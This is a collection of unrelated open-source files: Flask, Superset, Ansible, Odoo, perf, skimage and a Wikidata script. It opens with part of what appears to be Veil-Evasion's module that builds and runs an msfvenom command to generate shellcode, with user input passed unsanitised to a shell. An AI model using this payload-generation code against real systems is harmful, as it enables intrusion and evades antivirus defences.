if not re.match(r"^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$",value):
print helpers.color("\n [!] ERROR: Bad IP address specified.\n", warning=True)
value = ""
# otherwise assume we've been passed a domain name
else:
if not helpers.isValidHostname(value):
print helpers.color("\n [!] ERROR: Bad hostname specified.\n", warning=True)
value = ""
# if we don't have at least one period in the hostname/IP
else:
print helpers.color("\n [!] ERROR: Bad IP address or hostname specified.\n", warning=True)
value = ""
elif ':' in value:
try:
socket.inet_pton(socket.AF_INET6, value)
except socket.error:
print helpers.color("\n [!] ERROR: Bad IP address or hostname specified.\n", warning=True)
value = ""
else:
print helpers.color("\n [!] ERROR: Bad IP address or hostname specified.\n", warning=True)
value = ""
# LPORT validation
else:
# set the completer to fill in the default MSF port (4444)
readline.set_completer(completers.MSFPortCompleter().complete)
value = raw_input(' [>] Enter value for \'' + option + '\': ')
if option == "LPORT":
try:
if int(value) <= 0 or int(value) >= 65535:
print helpers.color(" [!] ERROR: Bad port number specified.\n", warning=True)
value = ""
except ValueError:
print helpers.color(" [!] ERROR: Bad port number specified.\n", warning=True)
value = ""
# append all the msfvenom options
self.msfvenomOptions.append(option + "=" + value)
# allow the user to input any extra OPTION=value pairs
extraValues = list()
while True:
# clear out the tab completion
readline.set_completer(completers.none().complete)
selection = raw_input(' [>] Enter extra msfvenom options in OPTION=value syntax: ')
if selection != "":
extraValues.append(selection)
else: break
# grab any specified msfvenom options in the /etc/veil/settings.py file
msfvenomOptions = ""
if hasattr(settings, "MSFVENOM_OPTIONS"):
msfvenomOptions = settings.MSFVENOM_OPTIONS
# build out the msfvenom command
# TODO: detect Windows and modify the paths appropriately
self.msfvenomCommand = "msfvenom " + msfvenomOptions + " -p " + payloadSelected
for option in self.msfvenomOptions:
self.msfvenomCommand += " " + option
self.options.append(option)
if len(extraValues) != 0 :
self.msfvenomCommand += " " + " ".join(extraValues)
self.msfvenomCommand += " -b \'\\x00\\x0a\\xff\' -f c | tr -d \'\"\' | tr -d \'\n\'"
def generate(self):
"""
Based on the options set by menu(), setCustomShellcode() or SetPayload()
either returns the custom shellcode string or calls msfvenom
and returns the result.
Returns the shellcode string for this object.
"""
# if the msfvenom command nor shellcode are set, revert to the
# interactive menu to set any options
if self.msfvenomCommand == "" and self.customshellcode == "":
self.menu()
# return custom specified shellcode if it was set previously
if self.customshellcode != "":
return self.customshellcode
# generate the shellcode using msfvenom
else:
print helpers.color("\n [*] Generating shellcode...")
if self.msfvenomCommand == "":
print helpers.color(" [!] ERROR: msfvenom command not specified in payload!\n", warning=True)
return None
else:
# Stript out extra characters, new lines, etc., just leave the shellcode.
# Tim Medin's patch for non-root non-kali users
FuncShellcode = subprocess.check_output(settings.METASPLOIT_PATH + self.msfvenomCommand, shell=True)
# try to get the current MSF build version do we can determine how to
# parse the shellcode
# pretty sure it was this commit that changed everything-
# https://github.com/rapid7/metasploit-framework/commit/4dd60631cbc88e8e6d5322a94a492714ff83fe2f
try:
# get the latest metasploit build version
f = open(settings.METASPLOIT_PATH + "/build_rev.txt")
lines = f.readlines()
f.close()
# extract the build version/data
version = lines[0]
major,date = version.split("-")
# 2014021901 - the version build date where msfvenom shellcode changed
if int(date) < 2014021901:
# use the old way
return FuncShellcode[82:-1].strip()
else:
# new way
return FuncShellcode[22:-1].strip()
# on error, default to the new version
except:
return FuncShellcode[22:-1].strip()
| gpl-3.0 |
wikimedia/mediawiki-extensions-WikidataEntitySuggester | wikiparser/createtables.py | 2 | 1087 | #!/usr/bin/python
"""Creates the DB and tables for wikiparser_db.py to insert into."""
import sys
import MySQLdb as mdb
def main():
con = mdb.connect('localhost', 'root', 'password', 'wikidatawiki');
with con:
cur = con.cursor()
try:
cur.execute("DROP TABLE IF EXISTS plabel")
except MySQLdb.Warning:
pass
cur.execute("CREATE TABLE plabel("
"pl_id INT UNSIGNED NOT NULL, "
"pl_lang VARCHAR(32) NOT NULL, "
"pl_text VARCHAR(256) NOT NULL) "
"ENGINE=InnoDB "
"CHARSET binary")
try:
cur.execute("DROP TABLE IF EXISTS label")
except MySQLdb.Warning:
pass
cur.execute("CREATE TABLE label("
"l_id INT UNSIGNED NOT NULL, "
"l_lang VARCHAR(32) NOT NULL, "
"l_text VARCHAR(256) NOT NULL) "
"ENGINE=InnoDB "
"CHARSET binary")
con.commit()
if __name__ == '__main__':
main()
| mit |
jeeb/spica-2.6.38 | tools/perf/scripts/python/futex-contention.py | 11261 | 1486 | # futex contention
# (c) 2010, Arnaldo Carvalho de Melo <acme@redhat.com>
# Licensed under the terms of the GNU GPL License version 2
#
# Translation of:
#
# http://sourceware.org/systemtap/wiki/WSFutexContention
#
# to perf python scripting.
#
# Measures futex contention
import os, sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + '/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from Util import *
process_names = {}
thread_thislock = {}
thread_blocktime = {}
lock_waits = {} # long-lived stats on (tid,lock) blockage elapsed time
process_names = {} # long-lived pid-to-execname mapping
def syscalls__sys_enter_futex(event, ctxt, cpu, s, ns, tid, comm,
nr, uaddr, op, val, utime, uaddr2, val3):
cmd = op & FUTEX_CMD_MASK
if cmd != FUTEX_WAIT:
return # we don't care about originators of WAKE events
process_names[tid] = comm
thread_thislock[tid] = uaddr
thread_blocktime[tid] = nsecs(s, ns)
def syscalls__sys_exit_futex(event, ctxt, cpu, s, ns, tid, comm,
nr, ret):
if thread_blocktime.has_key(tid):
elapsed = nsecs(s, ns) - thread_blocktime[tid]
add_stats(lock_waits, (tid, thread_thislock[tid]), elapsed)
del thread_blocktime[tid]
del thread_thislock[tid]
def trace_begin():
print "Press control+C to stop and show the summary"
def trace_end():
for (tid, lock) in lock_waits:
min, max, avg, count = lock_waits[tid, lock]
print "%s[%d] lock %x contended %d times, %d avg ns" % \
(process_names[tid], tid, lock, count, avg)
| gpl-2.0 |
chundongwang/Guess2014 | lib/flask/ctx.py | 776 | 14266 | # -*- coding: utf-8 -*-
"""
flask.ctx
~~~~~~~~~
Implements the objects required to keep the context.
:copyright: (c) 2011 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
from __future__ import with_statement
import sys
from functools import update_wrapper
from werkzeug.exceptions import HTTPException
from .globals import _request_ctx_stack, _app_ctx_stack
from .module import blueprint_is_module
from .signals import appcontext_pushed, appcontext_popped
class _AppCtxGlobals(object):
"""A plain object."""
def get(self, name, default=None):
return self.__dict__.get(name, default)
def __contains__(self, item):
return item in self.__dict__
def __iter__(self):
return iter(self.__dict__)
def __repr__(self):
top = _app_ctx_stack.top
if top is not None:
return '<flask.g of %r>' % top.app.name
return object.__repr__(self)
def after_this_request(f):
"""Executes a function after this request. This is useful to modify
response objects. The function is passed the response object and has
to return the same or a new one.
Example::
@app.route('/')
def index():
@after_this_request
def add_header(response):
response.headers['X-Foo'] = 'Parachute'
return response
return 'Hello World!'
This is more useful if a function other than the view function wants to
modify a response. For instance think of a decorator that wants to add
some headers without converting the return value into a response object.
.. versionadded:: 0.9
"""
_request_ctx_stack.top._after_request_functions.append(f)
return f
def copy_current_request_context(f):
"""A helper function that decorates a function to retain the current
request context. This is useful when working with greenlets. The moment
the function is decorated a copy of the request context is created and
then pushed when the function is called.
Example::
import gevent
from flask import copy_current_request_context
@app.route('/')
def index():
@copy_current_request_context
def do_some_work():
# do some work here, it can access flask.request like you
# would otherwise in the view function.
...
gevent.spawn(do_some_work)
return 'Regular response'
.. versionadded:: 0.10
"""
top = _request_ctx_stack.top
if top is None:
raise RuntimeError('This decorator can only be used at local scopes '
'when a request context is on the stack. For instance within '
'view functions.')
reqctx = top.copy()
def wrapper(*args, **kwargs):
with reqctx:
return f(*args, **kwargs)
return update_wrapper(wrapper, f)
def has_request_context():
"""If you have code that wants to test if a request context is there or
not this function can be used. For instance, you may want to take advantage
of request information if the request object is available, but fail
silently if it is unavailable.
::
class User(db.Model):
def __init__(self, username, remote_addr=None):
self.username = username
if remote_addr is None and has_request_context():
remote_addr = request.remote_addr
self.remote_addr = remote_addr
Alternatively you can also just test any of the context bound objects
(such as :class:`request` or :class:`g` for truthness)::
class User(db.Model):
def __init__(self, username, remote_addr=None):
self.username = username
if remote_addr is None and request:
remote_addr = request.remote_addr
self.remote_addr = remote_addr
.. versionadded:: 0.7
"""
return _request_ctx_stack.top is not None
def has_app_context():
"""Works like :func:`has_request_context` but for the application
context. You can also just do a boolean check on the
:data:`current_app` object instead.
.. versionadded:: 0.9
"""
return _app_ctx_stack.top is not None
class AppContext(object):
"""The application context binds an application object implicitly
to the current thread or greenlet, similar to how the
:class:`RequestContext` binds request information. The application
context is also implicitly created if a request context is created
but the application is not on top of the individual application
context.
"""
def __init__(self, app):
self.app = app
self.url_adapter = app.create_url_adapter(None)
self.g = app.app_ctx_globals_class()
# Like request context, app contexts can be pushed multiple times
# but there a basic "refcount" is enough to track them.
self._refcnt = 0
def push(self):
"""Binds the app context to the current context."""
self._refcnt += 1
_app_ctx_stack.push(self)
appcontext_pushed.send(self.app)
def pop(self, exc=None):
"""Pops the app context."""
self._refcnt -= 1
if self._refcnt <= 0:
if exc is None:
exc = sys.exc_info()[1]
self.app.do_teardown_appcontext(exc)
rv = _app_ctx_stack.pop()
assert rv is self, 'Popped wrong app context. (%r instead of %r)' \
% (rv, self)
appcontext_popped.send(self.app)
def __enter__(self):
self.push()
return self
def __exit__(self, exc_type, exc_value, tb):
self.pop(exc_value)
class RequestContext(object):
"""The request context contains all request relevant information. It is
created at the beginning of the request and pushed to the
`_request_ctx_stack` and removed at the end of it. It will create the
URL adapter and request object for the WSGI environment provided.
Do not attempt to use this class directly, instead use
:meth:`~flask.Flask.test_request_context` and
:meth:`~flask.Flask.request_context` to create this object.
When the request context is popped, it will evaluate all the
functions registered on the application for teardown execution
(:meth:`~flask.Flask.teardown_request`).
The request context is automatically popped at the end of the request
for you. In debug mode the request context is kept around if
exceptions happen so that interactive debuggers have a chance to
introspect the data. With 0.4 this can also be forced for requests
that did not fail and outside of `DEBUG` mode. By setting
``'flask._preserve_context'`` to `True` on the WSGI environment the
context will not pop itself at the end of the request. This is used by
the :meth:`~flask.Flask.test_client` for example to implement the
deferred cleanup functionality.
You might find this helpful for unittests where you need the
information from the context local around for a little longer. Make
sure to properly :meth:`~werkzeug.LocalStack.pop` the stack yourself in
that situation, otherwise your unittests will leak memory.
"""
def __init__(self, app, environ, request=None):
self.app = app
if request is None:
request = app.request_class(environ)
self.request = request
self.url_adapter = app.create_url_adapter(self.request)
self.flashes = None
self.session = None
# Request contexts can be pushed multiple times and interleaved with
# other request contexts. Now only if the last level is popped we
# get rid of them. Additionally if an application context is missing
# one is created implicitly so for each level we add this information
self._implicit_app_ctx_stack = []
# indicator if the context was preserved. Next time another context
# is pushed the preserved context is popped.
self.preserved = False
# remembers the exception for pop if there is one in case the context
# preservation kicks in.
self._preserved_exc = None
# Functions that should be executed after the request on the response
# object. These will be called before the regular "after_request"
# functions.
self._after_request_functions = []
self.match_request()
# XXX: Support for deprecated functionality. This is going away with
# Flask 1.0
blueprint = self.request.blueprint
if blueprint is not None:
# better safe than sorry, we don't want to break code that
# already worked
bp = app.blueprints.get(blueprint)
if bp is not None and blueprint_is_module(bp):
self.request._is_old_module = True
def _get_g(self):
return _app_ctx_stack.top.g
def _set_g(self, value):
_app_ctx_stack.top.g = value
g = property(_get_g, _set_g)
del _get_g, _set_g
def copy(self):
"""Creates a copy of this request context with the same request object.
This can be used to move a request context to a different greenlet.
Because the actual request object is the same this cannot be used to
move a request context to a different thread unless access to the
request object is locked.
.. versionadded:: 0.10
"""
return self.__class__(self.app,
environ=self.request.environ,
request=self.request
)
def match_request(self):
"""Can be overridden by a subclass to hook into the matching
of the request.
"""
try:
url_rule, self.request.view_args = \
self.url_adapter.match(return_rule=True)
self.request.url_rule = url_rule
except HTTPException as e:
self.request.routing_exception = e
def push(self):
"""Binds the request context to the current context."""
# If an exception occurs in debug mode or if context preservation is
# activated under exception situations exactly one context stays
# on the stack. The rationale is that you want to access that
# information under debug situations. However if someone forgets to
# pop that context again we want to make sure that on the next push
# it's invalidated, otherwise we run at risk that something leaks
# memory. This is usually only a problem in testsuite since this
# functionality is not active in production environments.
top = _request_ctx_stack.top
if top is not None and top.preserved:
top.pop(top._preserved_exc)
# Before we push the request context we have to ensure that there
# is an application context.
app_ctx = _app_ctx_stack.top
if app_ctx is None or app_ctx.app != self.app:
app_ctx = self.app.app_context()
app_ctx.push()
self._implicit_app_ctx_stack.append(app_ctx)
else:
self._implicit_app_ctx_stack.append(None)
_request_ctx_stack.push(self)
# Open the session at the moment that the request context is
# available. This allows a custom open_session method to use the
# request context (e.g. code that access database information
# stored on `g` instead of the appcontext).
self.session = self.app.open_session(self.request)
if self.session is None:
self.session = self.app.make_null_session()
def pop(self, exc=None):
"""Pops the request context and unbinds it by doing that. This will
also trigger the execution of functions registered by the
:meth:`~flask.Flask.teardown_request` decorator.
.. versionchanged:: 0.9
Added the `exc` argument.
"""
app_ctx = self._implicit_app_ctx_stack.pop()
clear_request = False
if not self._implicit_app_ctx_stack:
self.preserved = False
self._preserved_exc = None
if exc is None:
exc = sys.exc_info()[1]
self.app.do_teardown_request(exc)
# If this interpreter supports clearing the exception information
# we do that now. This will only go into effect on Python 2.x,
# on 3.x it disappears automatically at the end of the exception
# stack.
if hasattr(sys, 'exc_clear'):
sys.exc_clear()
request_close = getattr(self.request, 'close', None)
if request_close is not None:
request_close()
clear_request = True
rv = _request_ctx_stack.pop()
assert rv is self, 'Popped wrong request context. (%r instead of %r)' \
% (rv, self)
# get rid of circular dependencies at the end of the request
# so that we don't require the GC to be active.
if clear_request:
rv.request.environ['werkzeug.request'] = None
# Get rid of the app as well if necessary.
if app_ctx is not None:
app_ctx.pop(exc)
def auto_pop(self, exc):
if self.request.environ.get('flask._preserve_context') or \
(exc is not None and self.app.preserve_context_on_exception):
self.preserved = True
self._preserved_exc = exc
else:
self.pop(exc)
def __enter__(self):
self.push()
return self
def __exit__(self, exc_type, exc_value, tb):
# do not pop the request stack if we are in debug mode and an
# exception happened. This will allow the debugger to still
# access the request object in the interactive shell. Furthermore
# the context can be force kept alive for the test client.
# See flask.testing for how this works.
self.auto_pop(exc_value)
def __repr__(self):
return '<%s \'%s\' [%s] of %s>' % (
self.__class__.__name__,
self.request.url,
self.request.method,
self.app.name,
)
| apache-2.0 |
asdf2014/superset | superset/migrations/versions/a99f2f7c195a_rewriting_url_from_shortner_with_new_.py | 9 | 1825 | """rewriting url from shortner with new format
Revision ID: a99f2f7c195a
Revises: 53fc3de270ae
Create Date: 2017-02-08 14:16:34.948793
"""
# revision identifiers, used by Alembic.
revision = 'a99f2f7c195a'
down_revision = 'db0c65b146bd'
from alembic import op
import json
import sqlalchemy as sa
from superset import db
from superset.legacy import cast_form_data
from sqlalchemy.ext.declarative import declarative_base
from future.standard_library import install_aliases
install_aliases()
from urllib import parse
Base = declarative_base()
def parse_querystring(qs):
d = {}
for k, v in parse.parse_qsl(qs):
if not k in d:
d[k] = v
else:
if isinstance(d[k], list):
d[k].append(v)
else:
d[k] = [d[k], v]
return d
class Url(Base):
"""Used for the short url feature"""
__tablename__ = 'url'
id = sa.Column(sa.Integer, primary_key=True)
url = sa.Column(sa.Text)
def upgrade():
bind = op.get_bind()
session = db.Session(bind=bind)
urls = session.query(Url).all()
urls_len = len(urls)
for i, url in enumerate(urls):
if (
'?form_data' not in url.url and
'?' in url.url and
'dbid' not in url.url and
url.url.startswith('//superset/explore')):
d = parse_querystring(url.url.split('?')[1])
split = url.url.split('/')
d['datasource'] = split[5] + '__' + split[4]
d = cast_form_data(d)
newurl = '/'.join(split[:-1]) + '/?form_data=' + parse.quote_plus(json.dumps(d))
url.url = newurl
session.merge(url)
session.commit()
print('Updating url ({}/{})'.format(i, urls_len))
session.close()
def downgrade():
pass
| apache-2.0 |
axilleas/ansible | v1/tests/TestPlayVarsFiles.py | 95 | 12363 | #!/usr/bin/env python
import os
import shutil
from tempfile import mkstemp
from tempfile import mkdtemp
from ansible.playbook.play import Play
import ansible
import unittest
from nose.plugins.skip import SkipTest
class FakeCallBacks(object):
def __init__(self):
pass
def on_vars_prompt(self):
pass
def on_import_for_host(self, host, filename):
pass
class FakeInventory(object):
def __init__(self):
self.hosts = {}
def basedir(self):
return "."
def src(self):
return "fakeinventory"
def get_variables(self, host, vault_password=None):
if host in self.hosts:
return self.hosts[host]
else:
return {}
class FakePlayBook(object):
def __init__(self):
self.extra_vars = {}
self.remote_user = None
self.remote_port = None
self.sudo = None
self.sudo_user = None
self.su = None
self.su_user = None
self.become = None
self.become_method = None
self.become_user = None
self.transport = None
self.only_tags = None
self.skip_tags = None
self.force_handlers = None
self.VARS_CACHE = {}
self.SETUP_CACHE = {}
self.inventory = FakeInventory()
self.callbacks = FakeCallBacks()
self.VARS_CACHE['localhost'] = {}
class TestMe(unittest.TestCase):
########################################
# BASIC FILE LOADING BEHAVIOR TESTS
########################################
def test_play_constructor(self):
# __init__(self, playbook, ds, basedir, vault_password=None)
playbook = FakePlayBook()
ds = { "hosts": "localhost"}
basedir = "."
play = Play(playbook, ds, basedir)
def test_vars_file(self):
# make a vars file
fd, temp_path = mkstemp()
f = open(temp_path, "wb")
f.write("foo: bar\n")
f.close()
# create a play with a vars_file
playbook = FakePlayBook()
ds = { "hosts": "localhost",
"vars_files": [temp_path]}
basedir = "."
play = Play(playbook, ds, basedir)
os.remove(temp_path)
# make sure the variable was loaded
assert 'foo' in play.vars_file_vars, "vars_file was not loaded into play.vars_file_vars"
assert play.vars_file_vars['foo'] == 'bar', "foo was not set to bar in play.vars_file_vars"
def test_vars_file_nonlist_error(self):
# make a vars file
fd, temp_path = mkstemp()
f = open(temp_path, "wb")
f.write("foo: bar\n")
f.close()
# create a play with a string for vars_files
playbook = FakePlayBook()
ds = { "hosts": "localhost",
"vars_files": temp_path}
basedir = "."
error_hit = False
try:
play = Play(playbook, ds, basedir)
except:
error_hit = True
os.remove(temp_path)
assert error_hit == True, "no error was thrown when vars_files was not a list"
def test_multiple_vars_files(self):
# make a vars file
fd, temp_path = mkstemp()
f = open(temp_path, "wb")
f.write("foo: bar\n")
f.close()
# make a second vars file
fd, temp_path2 = mkstemp()
f = open(temp_path2, "wb")
f.write("baz: bang\n")
f.close()
# create a play with two vars_files
playbook = FakePlayBook()
ds = { "hosts": "localhost",
"vars_files": [temp_path, temp_path2]}
basedir = "."
play = Play(playbook, ds, basedir)
os.remove(temp_path)
os.remove(temp_path2)
# make sure the variables were loaded
assert 'foo' in play.vars_file_vars, "vars_file was not loaded into play.vars_file_vars"
assert play.vars_file_vars['foo'] == 'bar', "foo was not set to bar in play.vars_file_vars"
assert 'baz' in play.vars_file_vars, "vars_file2 was not loaded into play.vars_file_vars"
assert play.vars_file_vars['baz'] == 'bang', "baz was not set to bang in play.vars_file_vars"
def test_vars_files_first_found(self):
# make a vars file
fd, temp_path = mkstemp()
f = open(temp_path, "wb")
f.write("foo: bar\n")
f.close()
# get a random file path
fd, temp_path2 = mkstemp()
# make sure this file doesn't exist
os.remove(temp_path2)
# create a play
playbook = FakePlayBook()
ds = { "hosts": "localhost",
"vars_files": [[temp_path2, temp_path]]}
basedir = "."
play = Play(playbook, ds, basedir)
os.remove(temp_path)
# make sure the variable was loaded
assert 'foo' in play.vars_file_vars, "vars_file was not loaded into play.vars_file_vars"
assert play.vars_file_vars['foo'] == 'bar', "foo was not set to bar in play.vars_file_vars"
def test_vars_files_multiple_found(self):
# make a vars file
fd, temp_path = mkstemp()
f = open(temp_path, "wb")
f.write("foo: bar\n")
f.close()
# make a second vars file
fd, temp_path2 = mkstemp()
f = open(temp_path2, "wb")
f.write("baz: bang\n")
f.close()
# create a play
playbook = FakePlayBook()
ds = { "hosts": "localhost",
"vars_files": [[temp_path, temp_path2]]}
basedir = "."
play = Play(playbook, ds, basedir)
os.remove(temp_path)
os.remove(temp_path2)
# make sure the variables were loaded
assert 'foo' in play.vars_file_vars, "vars_file was not loaded into play.vars_file_vars"
assert play.vars_file_vars['foo'] == 'bar', "foo was not set to bar in play.vars_file_vars"
assert 'baz' not in play.vars_file_vars, "vars_file2 was loaded after vars_file1 was loaded"
def test_vars_files_assert_all_found(self):
# make a vars file
fd, temp_path = mkstemp()
f = open(temp_path, "wb")
f.write("foo: bar\n")
f.close()
# make a second vars file
fd, temp_path2 = mkstemp()
# make sure it doesn't exist
os.remove(temp_path2)
# create a play
playbook = FakePlayBook()
ds = { "hosts": "localhost",
"vars_files": [temp_path, temp_path2]}
basedir = "."
error_hit = False
error_msg = None
try:
play = Play(playbook, ds, basedir)
except ansible.errors.AnsibleError, e:
error_hit = True
error_msg = e
os.remove(temp_path)
assert error_hit == True, "no error was thrown for missing vars_file"
########################################
# VARIABLE PRECEDENCE TESTS
########################################
# On the first run vars_files are loaded into play.vars_file_vars by host == None
# * only files with vars from host==None will work here
# On the secondary run(s), a host is given and the vars_files are loaded into VARS_CACHE
# * this only occurs if host is not None, filename2 has vars in the name, and filename3 does not
# filename -- the original string
# filename2 -- filename templated with play vars
# filename3 -- filename2 template with inject (hostvars + setup_cache + vars_cache)
# filename4 -- path_dwim(filename3)
def test_vars_files_for_host(self):
# host != None
# vars in filename2
# no vars in filename3
# make a vars file
fd, temp_path = mkstemp()
f = open(temp_path, "wb")
f.write("foo: bar\n")
f.close()
# build play attributes
playbook = FakePlayBook()
ds = { "hosts": "localhost",
"vars_files": ["{{ temp_path }}"]}
basedir = "."
playbook.VARS_CACHE['localhost']['temp_path'] = temp_path
# create play and do first run
play = Play(playbook, ds, basedir)
# the second run is started by calling update_vars_files
play.update_vars_files(['localhost'])
os.remove(temp_path)
assert 'foo' in play.playbook.VARS_CACHE['localhost'], "vars_file vars were not loaded into vars_cache"
assert play.playbook.VARS_CACHE['localhost']['foo'] == 'bar', "foo does not equal bar"
########################################
# COMPLEX FILENAME TEMPLATING TESTS
########################################
def test_vars_files_two_vars_in_name(self):
# self.vars_file_vars = ds['vars']
# self.vars_file_vars += _get_vars() ... aka extra_vars
# make a temp dir
temp_dir = mkdtemp()
# make a temp file
fd, temp_file = mkstemp(dir=temp_dir)
f = open(temp_file, "wb")
f.write("foo: bar\n")
f.close()
# build play attributes
playbook = FakePlayBook()
ds = { "hosts": "localhost",
"vars": { "temp_dir": os.path.dirname(temp_file),
"temp_file": os.path.basename(temp_file) },
"vars_files": ["{{ temp_dir + '/' + temp_file }}"]}
basedir = "."
# create play and do first run
play = Play(playbook, ds, basedir)
# cleanup
shutil.rmtree(temp_dir)
assert 'foo' in play.vars_file_vars, "double var templated vars_files filename not loaded"
def test_vars_files_two_vars_different_scope(self):
#
# Use a play var and an inventory var to create the filename
#
# self.playbook.inventory.get_variables(host)
# {'group_names': ['ungrouped'], 'inventory_hostname': 'localhost',
# 'ansible_ssh_user': 'root', 'inventory_hostname_short': 'localhost'}
# make a temp dir
temp_dir = mkdtemp()
# make a temp file
fd, temp_file = mkstemp(dir=temp_dir)
f = open(temp_file, "wb")
f.write("foo: bar\n")
f.close()
# build play attributes
playbook = FakePlayBook()
playbook.inventory.hosts['localhost'] = {'inventory_hostname': os.path.basename(temp_file)}
ds = { "hosts": "localhost",
"vars": { "temp_dir": os.path.dirname(temp_file)},
"vars_files": ["{{ temp_dir + '/' + inventory_hostname }}"]}
basedir = "."
# create play and do first run
play = Play(playbook, ds, basedir)
# do the host run
play.update_vars_files(['localhost'])
# cleanup
shutil.rmtree(temp_dir)
assert 'foo' not in play.vars_file_vars, \
"mixed scope vars_file loaded into play vars"
assert 'foo' in play.playbook.VARS_CACHE['localhost'], \
"differently scoped templated vars_files filename not loaded"
assert play.playbook.VARS_CACHE['localhost']['foo'] == 'bar', \
"foo is not bar"
def test_vars_files_two_vars_different_scope_first_found(self):
#
# Use a play var and an inventory var to create the filename
#
# make a temp dir
temp_dir = mkdtemp()
# make a temp file
fd, temp_file = mkstemp(dir=temp_dir)
f = open(temp_file, "wb")
f.write("foo: bar\n")
f.close()
# build play attributes
playbook = FakePlayBook()
playbook.inventory.hosts['localhost'] = {'inventory_hostname': os.path.basename(temp_file)}
ds = { "hosts": "localhost",
"vars": { "temp_dir": os.path.dirname(temp_file)},
"vars_files": [["{{ temp_dir + '/' + inventory_hostname }}"]]}
basedir = "."
# create play and do first run
play = Play(playbook, ds, basedir)
# do the host run
play.update_vars_files(['localhost'])
# cleanup
shutil.rmtree(temp_dir)
assert 'foo' not in play.vars_file_vars, \
"mixed scope vars_file loaded into play vars"
assert 'foo' in play.playbook.VARS_CACHE['localhost'], \
"differently scoped templated vars_files filename not loaded"
assert play.playbook.VARS_CACHE['localhost']['foo'] == 'bar', \
"foo is not bar"
| gpl-3.0 |
kirca/OpenUpgrade | addons/board/controllers.py | 348 | 1970 | # -*- coding: utf-8 -*-
from xml.etree import ElementTree
from openerp.addons.web.controllers.main import load_actions_from_ir_values
from openerp.http import Controller, route, request
class Board(Controller):
@route('/board/add_to_dashboard', type='json', auth='user')
def add_to_dashboard(self, menu_id, action_id, context_to_save, domain, view_mode, name=''):
# FIXME move this method to board.board model
dashboard_action = load_actions_from_ir_values('action', 'tree_but_open',
[('ir.ui.menu', menu_id)], False)
if dashboard_action:
action = dashboard_action[0][2]
if action['res_model'] == 'board.board' and action['views'][0][1] == 'form':
# Maybe should check the content instead of model board.board ?
view_id = action['views'][0][0]
board = request.session.model(action['res_model']).fields_view_get(view_id, 'form')
if board and 'arch' in board:
xml = ElementTree.fromstring(board['arch'])
column = xml.find('./board/column')
if column is not None:
new_action = ElementTree.Element('action', {
'name': str(action_id),
'string': name,
'view_mode': view_mode,
'context': str(context_to_save),
'domain': str(domain)
})
column.insert(0, new_action)
arch = ElementTree.tostring(xml, 'utf-8')
return request.session.model('ir.ui.view.custom').create({
'user_id': request.session.uid,
'ref_id': view_id,
'arch': arch
}, request.context)
return False
| agpl-3.0 |
daenamkim/ansible | test/units/parsing/test_unquote.py | 298 | 1602 | # coding: utf-8
# (c) 2015, Toshio Kuratomi <tkuratomi@ansible.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible.parsing.quoting import unquote
import pytest
UNQUOTE_DATA = (
(u'1', u'1'),
(u'\'1\'', u'1'),
(u'"1"', u'1'),
(u'"1 \'2\'"', u'1 \'2\''),
(u'\'1 "2"\'', u'1 "2"'),
(u'\'1 \'2\'\'', u'1 \'2\''),
(u'"1\\"', u'"1\\"'),
(u'\'1\\\'', u'\'1\\\''),
(u'"1 \\"2\\" 3"', u'1 \\"2\\" 3'),
(u'\'1 \\\'2\\\' 3\'', u'1 \\\'2\\\' 3'),
(u'"', u'"'),
(u'\'', u'\''),
# Not entirely sure these are good but they match the current
# behaviour
(u'"1""2"', u'1""2'),
(u'\'1\'\'2\'', u'1\'\'2'),
(u'"1" 2 "3"', u'1" 2 "3'),
(u'"1"\'2\'"3"', u'1"\'2\'"3'),
)
@pytest.mark.parametrize("quoted, expected", UNQUOTE_DATA)
def test_unquote(quoted, expected):
assert unquote(quoted) == expected
| gpl-3.0 |
youprofit/scikit-image | skimage/measure/_find_contours.py | 38 | 9217 | import numpy as np
from . import _find_contours_cy
from collections import deque
_param_options = ('high', 'low')
def find_contours(array, level,
fully_connected='low', positive_orientation='low'):
"""Find iso-valued contours in a 2D array for a given level value.
Uses the "marching squares" method to compute a the iso-valued contours of
the input 2D array for a particular level value. Array values are linearly
interpolated to provide better precision for the output contours.
Parameters
----------
array : 2D ndarray of double
Input data in which to find contours.
level : float
Value along which to find contours in the array.
fully_connected : str, {'low', 'high'}
Indicates whether array elements below the given level value are to be
considered fully-connected (and hence elements above the value will
only be face connected), or vice-versa. (See notes below for details.)
positive_orientation : either 'low' or 'high'
Indicates whether the output contours will produce positively-oriented
polygons around islands of low- or high-valued elements. If 'low' then
contours will wind counter- clockwise around elements below the
iso-value. Alternately, this means that low-valued elements are always
on the left of the contour. (See below for details.)
Returns
-------
contours : list of (n,2)-ndarrays
Each contour is an ndarray of shape ``(n, 2)``,
consisting of n ``(row, column)`` coordinates along the contour.
Notes
-----
The marching squares algorithm is a special case of the marching cubes
algorithm [1]_. A simple explanation is available here::
http://www.essi.fr/~lingrand/MarchingCubes/algo.html
There is a single ambiguous case in the marching squares algorithm: when
a given ``2 x 2``-element square has two high-valued and two low-valued
elements, each pair diagonally adjacent. (Where high- and low-valued is
with respect to the contour value sought.) In this case, either the
high-valued elements can be 'connected together' via a thin isthmus that
separates the low-valued elements, or vice-versa. When elements are
connected together across a diagonal, they are considered 'fully
connected' (also known as 'face+vertex-connected' or '8-connected'). Only
high-valued or low-valued elements can be fully-connected, the other set
will be considered as 'face-connected' or '4-connected'. By default,
low-valued elements are considered fully-connected; this can be altered
with the 'fully_connected' parameter.
Output contours are not guaranteed to be closed: contours which intersect
the array edge will be left open. All other contours will be closed. (The
closed-ness of a contours can be tested by checking whether the beginning
point is the same as the end point.)
Contours are oriented. By default, array values lower than the contour
value are to the left of the contour and values greater than the contour
value are to the right. This means that contours will wind
counter-clockwise (i.e. in 'positive orientation') around islands of
low-valued pixels. This behavior can be altered with the
'positive_orientation' parameter.
